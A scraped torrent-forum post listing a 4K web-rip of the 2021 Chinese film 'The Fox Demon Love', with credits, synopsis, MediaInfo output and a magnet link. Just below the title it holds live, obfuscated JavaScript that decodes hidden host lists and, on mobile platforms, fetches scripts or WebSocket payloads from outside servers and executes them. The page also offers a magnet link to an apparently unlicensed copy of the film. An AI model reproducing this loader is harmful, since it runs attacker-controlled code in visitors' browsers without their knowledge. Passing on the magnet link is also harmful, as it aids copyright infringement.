玄夜狐影[国语音轨].The.Fox.Demon.Love.2021.WEB-DL.4K.H265.DDP.5.1 11.97GB

版主小s 1月前 247

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 玄夜狐影 / 聊斋之玄夜狐影 / The Fox Demon Love
◎年  代 2021
◎产  地 中国大陆
◎类  别 惊悚 / 奇幻
◎语  言 汉语普通话
◎上映日期 2021-06-11(中国大陆)
◎IMDb链接 https://www.imdb.com/title//
◎豆瓣链接 https://movie.douban.com/subject/27013532/
◎片  长 96分钟
◎导  演 张少军 Shaojun Zhang (id:1352619)
◎编  剧 张少军 Shaojun Zhang (id:1352619)
◎演  员 葛天 Tian Ge (id:1342863)
       花昆 Kun Hua (id:1322385)
       袁晶 Jing Yuan (id:1317492)
       王思懿 Siyi Wang (id:1314405)
       黄海 Hai Huang (id:1337598)
       程实 Shi Cheng (id:1371720)
       马潇煊 Xiaoxuan Ma (id:1451219)
       廖娟 Juan Liao (id:1349907)
       谭树明 Shuming Tan (id:1443928)

◎标  签 烂 / 奇幻仙侠 / 华语 / 2021 / 中国大陆 / 玄幻 / 感觉还行 / 2021等评分

◎简  介
  根据《聊斋志异之连锁》改编。                                    
                                明朝末年,正直的书生杨于畏因遭奸人所害,被迫搬到山中荒废的破庙居住,从而结识神秘书生胡连锁并成为好友。却不料,他因此卷入了一场诡异恐怖的争斗之中……

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 191944598062020247406967017307031768063 (0x90672F56126298D3799A28458E408BFF)

  4. Complete name                            : [email protected]mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 12.0 GiB

  8. Duration                                 : 1 h 36 min

  9. Overall bit rate                         : 17.7 Mb/s

  10. Encoded date                             : UTC 2021-08-09 09:11:06

  11. Writing application                      : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : [email protected]@Main

  18. Codec ID                                 : V_MPEGH/ISO/HEVC

  19. Duration                                 : 1 h 36 min

  20. Bit rate                                 : 17.2 Mb/s

  21. Width                                    : 3 840 pixels

  22. Height                                   : 1 632 pixels

  23. Display aspect ratio                     : 2.35:1

  24. Frame rate mode                          : Constant

  25. Frame rate                               : 24.000 FPS

  26. Color space                              : YUV

  27. Chroma subsampling                       : 4:2:0

  28. Bit depth                                : 8 bits

  29. Bits/(Pixel*Frame)                       : 0.115

  30. Stream size                              : 11.7 GiB (97%)

  31. Default                                  : Yes

  32. Forced                                   : No


  33. Audio #1

  34. ID                                       : 2

  35. Format                                   : E-AC-3

  36. Format/Info                              : Enhanced AC-3

  37. Commercial name                          : Dolby Digital Plus

  38. Codec ID                                 : A_EAC3

  39. Duration                                 : 1 h 36 min

  40. Bit rate mode                            : Constant

  41. Bit rate                                 : 256 kb/s

  42. Channel(s)                               : 6 channels

  43. Channel layout                           : L R C LFE Ls Rs

  44. Sampling rate                            : 48.0 kHz

  45. Frame rate                               : 31.250 FPS (1536 SPF)

  46. Compression mode                         : Lossy

  47. Stream size                              : 177 MiB (1%)

  48. Language                                 : Chinese

  49. Service kind                             : Complete Main

  50. Default                                  : Yes

  51. Forced                                   : No


  52. Audio #2

  53. ID                                       : 3

  54. Format                                   : AAC LC

  55. Format/Info                              : Advanced Audio Codec Low Complexity

  56. Codec ID                                 : A_AAC-2

  57. Duration                                 : 1 h 36 min

  58. Bit rate                                 : 192 kb/s

  59. Channel(s)                               : 2 channels

  60. Channel layout                           : L R

  61. Sampling rate                            : 44.1 kHz

  62. Frame rate                               : 43.066 FPS (1024 SPF)

  63. Compression mode                         : Lossy

  64. Stream size                              : 131 MiB (1%)

  65. Language                                 : Chinese

  66. Default                                  : No

  67. Forced                                   : No



TAGS 奇幻 惊悚

磁力链:
  • magnet:?xt=urn:btih:49C2B10E1A685C3E8BA880B3618FFE2F4EE0E23B
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回